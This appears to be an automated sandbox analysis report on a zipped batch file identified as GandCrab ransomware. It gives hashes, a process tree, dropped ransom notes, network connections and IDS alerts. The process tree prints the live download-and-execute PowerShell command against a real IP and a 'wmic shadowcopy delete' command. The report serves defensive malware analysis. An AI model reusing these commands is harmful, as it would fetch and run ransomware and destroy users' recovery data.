File name: | test_ran.bat.zip.zip |
Full analysis: | https://app.any.run/tasks/7a730f6a-9af5-42b8-9506-7ae26e185d38 |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | November 08, 2018, 09:29:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 0F2F9DE6010D559B34C3143B2D6F385E |
SHA1: | 595C99433B564F1A57553CF5ED5E5A9B9FD573C5 |
SHA256: | DA0C26E8B5431ECC98B7541919CFBB67F2F50A002D9F195375C44BFDFBC35799 |
SSDEEP: | 12:5TkfQCyj41IawO9w5b/rkkKftzXCHY2OXkWkTiTEa0n:tkyjU0O9w5GNSBAm5n |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | test_ran.bat.zip |
---|---|
ZipUncompressedSize: | 293 |
ZipCompressedSize: | 291 |
ZipCRC: | 0x45b18bc3 |
ZipModifyDate: | 2018:11:08 10:29:25 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3708 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\test_ran.bat.zip.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
1216 | "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\Rar$DIb3708.43025\test_ran.bat.zip | C:\Program Files\WinRAR\WinRAR.exe | — | WinRAR.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2372 | cmd /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIb1216.44211\test_ran.bat" " | C:\Windows\system32\cmd.exe | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
256 | powershell.exe IEX ((new-object net.webclient).downloadstring('http://198.211.105.99/kasa'));Invoke-SZYIITYRAYH;Start-Sleep -s 1000000; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2828 | "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete | C:\Windows\system32\wbem\wmic.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147749908 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3968 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\QZWWJFJNT-DECRYPT.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2792 | "C:\Program Files\Google\Chrome\Application\chrome.exe" | C:\Program Files\Google\Chrome\Application\chrome.exe | explorer.exe | |
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Version: 68.0.3440.106 | ||||
1864 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x701100b0,0x701100c0,0x701100cc | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Version: 68.0.3440.106 | ||||
3568 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=568 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Version: 68.0.3440.106 | ||||
1412 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D6F98CAFFE73E5AAD170818777692A5C --mojo-platform-channel-handle=880 --ignored=" --type=renderer " /prefetch:2 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: LOW Description: Google Chrome Version: 68.0.3440.106 |
PID | Process | Filename | Type | |
---|---|---|---|---|
256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1U62HOBQO6KI2F9GDWBP.temp | — | |
MD5:— | SHA256:— | |||
256 | powershell.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | — | |
MD5:— | SHA256:— | |||
256 | powershell.exe | C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData | — | |
MD5:— | SHA256:— | |||
256 | powershell.exe | C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings | — | |
MD5:— | SHA256:— | |||
256 | powershell.exe | C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata | — | |
MD5:— | SHA256:— | |||
256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dfad6.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
256 | powershell.exe | C:\Users\admin\AppData\QZWWJFJNT-DECRYPT.txt | text | |
MD5:5AA4ECDB6AA285114A4C153EF6072F0F | SHA256:80A3A3E53E6DA3D7BD807F29D8E860EEE54B17DAE8004BB1B198722ED167D5FD | |||
256 | powershell.exe | C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Forms\QZWWJFJNT-DECRYPT.txt | text | |
MD5:5AA4ECDB6AA285114A4C153EF6072F0F | SHA256:80A3A3E53E6DA3D7BD807F29D8E860EEE54B17DAE8004BB1B198722ED167D5FD | |||
256 | powershell.exe | C:\Users\admin\.oracle_jre_usage\QZWWJFJNT-DECRYPT.txt | text | |
MD5:5AA4ECDB6AA285114A4C153EF6072F0F | SHA256:80A3A3E53E6DA3D7BD807F29D8E860EEE54B17DAE8004BB1B198722ED167D5FD | |||
256 | powershell.exe | C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\QZWWJFJNT-DECRYPT.txt | text | |
MD5:5AA4ECDB6AA285114A4C153EF6072F0F | SHA256:80A3A3E53E6DA3D7BD807F29D8E860EEE54B17DAE8004BB1B198722ED167D5FD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
256 | powershell.exe | GET | — | 78.46.77.98:80 | http://www.2mmotorsport.biz/ | DE | — | — | suspicious |
256 | powershell.exe | GET | 200 | 136.243.13.215:80 | http://www.holzbock.biz/ | DE | html | 1.78 Kb | suspicious |
256 | powershell.exe | GET | — | 192.185.159.253:80 | http://www.pizcam.com/ | US | — | — | malicious |
256 | powershell.exe | GET | 301 | 83.166.138.7:80 | http://www.whitepod.com/ | CH | — | — | whitelisted |
256 | powershell.exe | GET | — | 83.138.82.107:80 | http://www.swisswellness.com/ | DE | — | — | whitelisted |
256 | powershell.exe | GET | 200 | 198.211.105.99:80 | http://198.211.105.99/kasa | US | text | 287 Kb | malicious |
256 | powershell.exe | GET | 200 | 74.220.215.73:80 | http://www.bizziniinfissi.com/ | US | html | 6.96 Kb | malicious |
256 | powershell.exe | POST | 404 | 74.220.215.73:80 | http://www.bizziniinfissi.com/includes/pictures/dehe.jpg | US | html | 2.61 Kb | malicious |
256 | powershell.exe | POST | — | 83.138.82.107:80 | http://www.swisswellness.com/wp-content/assets/deameshe.jpg | DE | — | — | whitelisted |
256 | powershell.exe | GET | 301 | 104.24.22.22:80 | http://www.belvedere-locarno.com/ | US | — | — | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
256 | powershell.exe | 136.243.13.215:80 | www.holzbock.biz | Hetzner Online GmbH | DE | suspicious |
256 | powershell.exe | 198.211.105.99:80 | — | Digital Ocean, Inc. | US | malicious |
256 | powershell.exe | 78.46.77.98:80 | www.2mmotorsport.biz | Hetzner Online GmbH | DE | suspicious |
256 | powershell.exe | 74.220.215.73:80 | www.bizziniinfissi.com | Unified Layer | US | malicious |
256 | powershell.exe | 217.26.53.161:80 | www.haargenau.biz | Hostpoint AG | CH | malicious |
256 | powershell.exe | 109.234.38.95:80 | www.fliptray.biz | Webzilla B.V. | RU | unknown |
256 | powershell.exe | 78.46.77.98:443 | www.2mmotorsport.biz | Hetzner Online GmbH | DE | suspicious |
256 | powershell.exe | 192.185.159.253:80 | www.pizcam.com | CyrusOne LLC | US | malicious |
256 | powershell.exe | 83.138.82.107:80 | www.swisswellness.com | hostNET Medien GmbH | DE | suspicious |
256 | powershell.exe | 109.234.38.95:443 | www.fliptray.biz | Webzilla B.V. | RU | unknown |
Domain | IP | Reputation |
---|---|---|
www.2mmotorsport.biz |
| unknown |
www.haargenau.biz |
| unknown |
www.bizziniinfissi.com |
| malicious |
www.holzbock.biz |
| unknown |
www.fliptray.biz |
| malicious |
www.pizcam.com |
| unknown |
www.swisswellness.com |
| whitelisted |
www.hotelweisshorn.com |
| unknown |
www.whitepod.com |
| whitelisted |
www.hardrockhoteldavos.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
256 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
256 | powershell.exe | A Network Trojan was detected | ET TROJAN Possible Malicious PowerSploit PowerShell Script Observed over HTTP |
256 | powershell.exe | A Network Trojan was detected | ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity |
256 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity |
256 | powershell.exe | A Network Trojan was detected | ET POLICY Data POST to an image file (jpg) |
256 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity |
256 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity |
256 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity |
256 | powershell.exe | A Network Trojan was detected | ET POLICY Data POST to an image file (jpg) |
256 | powershell.exe | A Network Trojan was detected | ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity |